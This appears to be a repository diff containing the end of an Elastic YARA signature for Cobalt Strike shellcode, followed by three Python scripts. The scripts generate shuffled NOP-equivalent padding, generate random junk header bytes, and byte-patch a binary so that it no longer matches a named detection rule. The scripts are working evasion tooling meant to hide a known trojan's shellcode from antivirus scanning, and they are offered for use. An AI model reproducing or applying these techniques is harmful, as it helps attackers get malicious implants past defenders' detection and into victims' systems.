     1018 + fingerprint = "292f15bdc978fc29670126f1bdc72ade1e7faaf1948653f70b6789a82dbee67f"
     1019 + creation_date = "2022-08-29"
     1020 + last_modified = "2022-09-29"
     1021 + description = "CS shellcode variants"
     1022 + threat_name = "Windows.Trojan.CobaltStrike"
     1023 + reference_sample = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a"
     1024 + severity = 100
     1025 + arch_context = "x86"
     1026 + scan_context = "file, memory"
     1027 + license = "Elastic License v2"
     1028 + os = "windows"
     1029 + strings:
     1030 + $a1 = { 55 89 E5 83 EC ?? A1 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 31 C0 C9 C3 55 }
     1031 + $a2 = { 55 89 E5 83 EC ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 31 C0 C9 C3 55 89 E5 83 EC ?? 83 7D ?? ?? }
     1032 + $a3 = { 55 89 E5 8B 45 ?? 5D FF E0 55 8B 15 ?? ?? ?? ?? 89 E5 8B 45 ?? 85 D2 7E ?? 83 3D ?? ?? ?? ?? ?? }
     1033 + $a4 = { 55 89 E5 8B 45 ?? 5D FF E0 55 89 E5 83 EC ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? 85 D2 7E ?? 83 3D ?? ?? ?? ?? ?? }
     1034 + $a5 = { 4D 5A 41 52 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 8D 1D ?? ?? ?? ?? 48 89 DF 48 81 C3 ?? ?? ?? ?? }
     1035 + condition:
     1036 + 1 of ($a*)
     1037 +}
     1038 + 
     1039 + 
  • ■ ■ ■ ■ ■ ■
    prepend.py
     1 +import random
     2 + 
     3 +# Define the byte strings to shuffle
     4 +byte_strings = ["40", "41", "42", "6690", "40", "43", "44", "45", "46", "47", "48", "49", "4c", "90", "0f1f00", "660f1f0400", "0f1f0400", "0f1f00", "0f1f00", "87db", "87c9", "87d2", "6687db", "6687c9", "6687d2"]
     5 + 
     6 +# Shuffle the byte strings
     7 +random.shuffle(byte_strings)
     8 + 
     9 +# Create a new list to store the formatted bytes
     10 +formatted_bytes = []
     11 + 
     12 +# Loop through each byte string in the shuffled list
     13 +for byte_string in byte_strings:
     14 + # Check if the byte string has more than 2 characters
     15 + if len(byte_string) > 2:
     16 + # Split the byte string into chunks of two characters
     17 + byte_list = [byte_string[i:i+2] for i in range(0, len(byte_string), 2)]
     18 + # Add \x prefix to each byte and join them
     19 + formatted_bytes.append(''.join([f'\\x{byte}' for byte in byte_list]))
     20 + else:
     21 + # Add \x prefix to the single byte
     22 + formatted_bytes.append(f'\\x{byte_string}')
     23 +
     24 +# Join the formatted bytes into a single string
     25 +formatted_string = ''.join(formatted_bytes)
     26 + 
     27 +# Print the formatted byte string
     28 +print(formatted_string)
     29 + 
  • ■ ■ ■ ■ ■ ■
    rich_header.py
     1 +#rich header
     2 + 
     3 +import random
     4 + 
     5 +def generate_junk_assembly(length):
     6 + return ''.join([chr(random.randint(0, 255)) for _ in range(length)])
     7 + 
     8 +def generate_rich_header(length):
     9 + rich_header = generate_junk_assembly(length)
     10 + rich_header_hex = ''.join([f"\\x{ord(c):02x}" for c in rich_header])
     11 + return rich_header_hex
     12 + 
     13 +#generate a number of assembly opcodes (4-byte aligned)
     14 +print(generate_rich_header(random.randint(5,20) * 4))
     15 + 
  • ■ ■ ■ ■ ■ ■
    rule_f0b627fc_bypass.py
     1 +import sys
     2 + 
     3 +def replace_bytes(input_filename, output_filename):
     4 + search_bytes = b"\x25\xff\xff\xff\x00\x3d\x41\x41\x41\x00"
     5 + replacement_bytes = b"\xb8\x41\x41\x41\x00\x3D\x41\x41\x41\x00"
     6 +
     7 + with open(input_filename, "rb") as input_file:
     8 + content = input_file.read()
     9 + modified_content = content.replace(search_bytes, replacement_bytes)
     10 +
     11 + with open(output_filename, "wb") as output_file:
     12 + output_file.write(modified_content)
     13 +
     14 + print(f"Replacement complete. Modified content saved to {output_filename}.")
     15 + 
     16 +if len(sys.argv) == 2:
     17 + input_filename = sys.argv[1]
     18 + output_filename = "output.bin"
     19 + replace_bytes(input_filename, output_filename)
     20 +else:
     21 + print("No arguments provided")
     22 + 
     23 +#find
     24 +#25 FF FF FF 00 3D 41 41 41 00
     25 +#and eax,0xffffff
     26 +#cmp eax,0x414141
     27 + 
     28 +#replace to
     29 +#b8 41 41 41 00 3d 41 41 41 00
     30 +#mov eax,0x414141
     31 +#cmp eax,0x414141
     32 + 
     33 + 
Please wait...
Page is in error, reload to recover